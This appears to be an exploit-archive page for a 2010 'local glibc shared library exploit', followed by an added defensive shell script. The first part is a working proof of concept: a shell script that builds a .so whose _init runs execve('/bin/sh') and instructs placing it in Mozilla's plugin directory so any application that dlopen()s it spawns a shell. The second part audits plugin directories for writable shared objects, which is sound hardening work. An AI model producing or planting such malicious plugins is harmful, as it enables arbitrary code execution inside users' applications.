45 lines
No EOL
1.5 KiB
Text
# Exploit Title: Local Glibc shared library (.so) exploit
# Date: 07.04.10
# Author: Rh0 (Rh0@z1p.biz)
# Software Link: NA
# Version: <= 2.11.1, higher not tested
# Tested on: Debian stable (x86-64), Ubuntu 9.10 (x86), Fedora 12 (x86)
# CVE : NA
# Code :
|
#!/bin/sh

# A lot of applications in Linux use the shared library mechanism to
# load plugins, e.g. Mozilla, the Geany IDE, Compiz, the Epiphany web
# browser and more. Shared libraries are often initialized (but not
# loaded) during startup, on a click on something like "->Tools->Plugins"
# in the menu, or at the latest when the plugin is activated. dlopen(),
# which is part of glibc, is used for the initialization.
# See http://linux.die.net/man/3/dlopen.
# It always executes the _init section of the shared library. A
# malformed _init section makes dlopen() crash (NULL dereference). But
# this is not even necessary to exploit an application, since a custom
# _init section is always executed when dlopen() is called. The exploit
# can be a custom compiled file. Alternatively, the _init section of a
# plugin already shipped with the application can be overwritten with
# working shellcode to exploit it, or with some \x41 bytes to crash it.

# PoC:
|
cat >Xlibx.c<<EOF
#include <unistd.h>

/* Runs as soon as the application dlopen()s this library. */
void _init(void)
{
    execve("/bin/sh", NULL, NULL); /* evil _init */
}
EOF

gcc -fPIC -c Xlibx.c
# link with ld directly: gcc -shared would add crti.o, which already defines _init
ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o
rm Xlibx.c
rm Xlibx.o

echo "* copy Xlibx.so to appropriate directory:"
echo "* Mozilla: HOMEDIR/.mozilla/plugins/ "
echo "* firefox->Edit->Preferences => Exploit "
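The mitigation side of the above, as an added example that is not part of Rh0's PoC: because dlopen() runs whatever initializer a shared object carries, the practical defence is to make sure nobody but the owner can add or replace objects in the directories an application loads plugins from. The script below audits such directories with POSIX tools only (ls and cut); if readelf is installed it additionally reports whether each object carries a DT_INIT or INIT_ARRAY entry, i.e. code that dlopen() would run on load. The directory paths in the usage line are assumptions based on the page's own Mozilla example.

```shell
#!/bin/sh
# Added defensive audit, not part of the original PoC. Given one or more
# plugin directories, it lists each shared object and flags the ones that
# someone other than the owner could replace or add to: files or
# directories writable by group or others. "WRITABLE" marks a finding.

# Print the 10-character mode string of a path, e.g. "-rw-rw-r--".
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Return 0 if the mode string shows a group-write (pos. 6) or
# other-write (pos. 9) bit, 1 otherwise.
is_shared_writable() {
    case "$1" in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Audit one directory. Returns 0 if clean, 1 if anything was flagged,
# 2 if the directory does not exist.
audit_plugin_dir() {
    dir="$1"
    flagged=0
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 2; }
    dmode=$(mode_of "$dir")
    if is_shared_writable "$dmode"; then
        echo "WRITABLE dir  $dmode $dir (group/other can drop a .so here)"
        flagged=$((flagged + 1))
    fi
    for so in "$dir"/*.so; do
        [ -e "$so" ] || continue      # no .so files: glob stays literal
        fmode=$(mode_of "$so")
        init="init:unknown"           # readelf is optional
        if command -v readelf >/dev/null 2>&1; then
            if readelf -d "$so" 2>/dev/null | grep -qE '\((INIT|INIT_ARRAY)\)'; then
                init="init:yes"       # has an initializer dlopen() will run
            else
                init="init:no"
            fi
        fi
        if is_shared_writable "$fmode"; then
            echo "WRITABLE file $fmode $init $so"
            flagged=$((flagged + 1))
        else
            echo "ok       file $fmode $init $so"
        fi
    done
    [ "$flagged" -eq 0 ]
}

# Usage (paths are assumptions taken from the page's Mozilla example):
#   sh audit_plugins.sh "$HOME/.mozilla/plugins" /usr/lib/mozilla/plugins
if [ $# -gt 0 ]; then
    rc=0
    for d in "$@"; do
        audit_plugin_dir "$d" || rc=1
    done
    exit $rc
fi
```

Run it against every directory an application searches for plugins; a WRITABLE line means a user who is not the owner can plant or overwrite an object that the application will dlopen() with its own privileges. The exit status is non-zero whenever something was flagged, so the script can sit in a cron job or a hardening checklist without parsing its output.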